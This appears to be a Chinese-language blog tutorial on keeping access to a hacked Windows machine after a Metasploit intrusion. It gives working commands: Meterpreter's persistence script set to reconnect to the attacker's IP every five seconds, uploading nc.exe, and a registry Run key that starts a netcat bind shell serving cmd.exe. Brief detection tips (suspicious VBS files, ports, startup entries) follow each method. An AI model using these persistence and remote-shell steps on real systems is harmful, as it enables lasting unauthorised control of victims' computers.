后门是怎样植入的

声明：谢绝一切形式的转载，禁止用作非法目的

当通过木马或者漏洞成功入侵别人电脑后，由于MSF发起的攻击都是基于内存的，因此，当被入侵的电脑关机之后或者漏洞修复之后，前期建立的连接就都不复存在了。所以，有必要在被入侵的电脑上安装后门，让肉鸡每次重启之后，都能和自己的机器自动建立连接。

准备条件

肉鸡:Windows位防火墙开启

通过木马建立连接

具体内容可参考

这里

Persistence后门

建立后门

通过下面的帮助信息，可以看出persitence模块是用来在目标机器上创建后门的脚本。比较常用的参数-A、-X、-I、-p、-r，具体含义可查看帮助。

meterpreterrunpersistence-h[!]Meterpreterscriptsaredeprecated.Tryexploit/windows/local/persistence.[!]Example:runexploit/windows/local/persistenceOPTION=value[...]MeterpreterScriptforcreatingapersistentbackdooronatargethost.OPTIONS:-AAutomaticallystartamatchingexploit/multi/handlertoconnecttotheagent-LoptLocationintargethosttowritepayloadto,ifnone%TEMP%willbeused.-PoptPayloadtouse,defaultiswindows/meterpreter/reverse_tcp.-SAutomaticallystarttheagentonbootasaservice(withSYSTEMprivileges)-ToptAlternateexecutabletemplatetouse-UAutomaticallystarttheagentwhentheUserlogson-XAutomaticallystarttheagentwhenthesystemboots-hThishelpmenu-ioptTheintervalinsecondsbetweeneachconnectionattempt-poptTheportonwhichthesystemrunningMetasploitislistening-roptTheIPofthesystemrunningMetasploitlisteningfortheconnectback

建立一个后门，每隔5s尝试建立连接，自动匹配模块exploit/multi/handler连接黑客的机器。

runpersistence-A-X-i5-p-r..42.49

运行命令之后，可以看出生成了一个vbs脚本。Persistence后门基于的就是这个脚本。

杀死端口对应的会话。

sessions-k5

过一会，发现端口的会话又建立起来了。

将肉鸡重启，查看端口的会话是否会被重新建立。

从图中可以看出，重启之后，会话又被成功建立起来了。

检测后门

(1)查看相应的目录是否有可疑的vbs。(2)查看可疑端口(3)查看可疑的开机启动项

nc后门

建立nc后门

nc.exe具有瑞士军刀的美名，其在反向连接方面的功能可以用强大甚至恐怖来形容。

上传nc后门到肉鸡

upload/usr/share/windows-binaries/nc.exeC:\\windows\\system32

枚举注册表内容（开机启动），注册表相关的内容在前面有介绍。

regenumkey-kHKLM\\software\\microsoft\\windows\\currentversion\\run

在该注册表增加内容（开机启动）

regsetval-kHKLM\\software\\microsoft\\windows\\currentversion\\run-vnc-dC:\windows\system32\nc.exe-Ldp-ecmd.exe

查看内容

regqueryval-kHKLM\\software\\microsoft\\windows\\currentversion\\Run-vnc

具体过程如下:

重启肉鸡，通过nc连接

nc..42.40

成功连接后，能够获得肉鸡的cmd终端：

检测nc后门

通过主注册表的开机启动项目进行检测。通过nc程序名字进行检测，这个很容易绕过，改成具有迷惑行为的名字就可以可疑端口检测metsvc后门

使用如下命令

runmetsvc

然后重启之后，通过bind_tcp进行主动连接。由于版本问题，在win位上，相应的服务起不来，不做过多介绍。

写在最后

后门植入，是进行持续性攻击的有效手段。其基本原理大都是基于开启启动项，大多数都是通过注册表实现的，因此，开机启动项要认真辨别，否则，你的机器可能就是一台肉鸡。

相应的视频，后续会更新。更多内容，欢迎

转载请注明：http://www.abuoumao.com/hyfz/1955.html